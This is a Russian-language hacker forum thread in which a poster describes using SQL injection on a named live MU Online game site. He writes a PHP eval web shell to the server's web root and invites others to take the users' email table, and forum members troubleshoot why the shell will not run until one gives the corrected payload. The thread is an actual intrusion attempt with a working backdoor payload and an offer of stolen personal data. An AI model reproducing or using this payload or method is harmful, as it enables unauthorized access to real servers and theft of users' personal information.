Хай! Вот нащёл сайт! _http://jeux-mu-sacre-online.no-ip.org/ Нащёл в нём SQL Injection, выполнил команду echo "<? eval(stripslashes($_GET[c])); ?>" > D:/wamp/www/info.php Файл создался, но... http://jeux-mu-sacre-online.no-ip.org/info.php?c=echo '123'; И ничего... В общем если кому удасться разобраться в чём проблема, раскажите А БД можете себе брать, тама MSSQL в БД: MuOnline Таблица: MEMB_INFO Колонка: mail_addr Хранятся мыльники юзверей (я так понимаю их тама только 389 ) В общем очень интересно где скривили мои руки, почему сервер не слушает меня
А ты посмотри в сорсаx что делается - "<? eval(stripslashes($_GET[c])); ?>" так в кавычкаx и осталось!!!
sunb0rn, а без ковычек никак, ктомуже они на PHP никак не действуют! Как я буду использовать echo text > file если там символ > и в <? , ?> тоже эти символы... Я так много раз делал, всё работало, а вот тут нехочет...
sunb0rn, php код между тегами <? ?> в данном случае. все что до него и после - не важно. Ponchik, посмотри код страницы) пхп не обрабатывается.
Почему не обрабатывается... Еслиб не обрабатывался, нобы и выводил весь код страницы, а так всё фурычит... Странно... Мистикааааа! В общем можно забить на этот сайт...
Green_Bear, в смысле про сайт... Вот я на локалхосте проверил и показал! max_pain89, ты про ' превращается в \' ? Для этого я юзаю stripslashes() он исправляет этот баг Да и твой вариант всёравно не работает, бнсполезно я так понимаю пытаться, потому-что я и copy("шелл","Системный путь") проблвал, нефурычит! Странно...
кароч понял что за фишка... у меня тож wamp стоял... долго не мог допереть почему мои скрипты так же не пашут =))) оказываецо надо делать так <?php eval(stripslashes($_GET[c])); ?>